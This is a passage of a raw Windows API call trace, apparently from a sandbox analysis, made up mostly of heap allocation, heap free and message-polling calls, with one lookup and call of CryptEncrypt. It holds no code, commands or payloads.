lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.624] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.625] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.625] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.625] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.625] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.625] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0252.626] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.626] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.627] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0252.627] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.627] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.627] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e30 | out: hHeap=0x25c0000) returned 1 [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0252.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.628] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.628] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.628] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.628] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.629] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.629] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d960 | out: hHeap=0x25c0000) returned 1 [0252.629] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.630] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab38 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa880 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.633] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.634] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.635] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1738 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.635] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0252.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa388, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.637] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0252.637] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b6a30 [0252.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0252.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18a8 [0252.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0252.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0252.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0252.638] CryptEncrypt (in: hKey=0xaa5660, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0xafeb, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0xaff0) returned 1 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.639] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0252.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.641] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8b0 [0252.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0252.641] 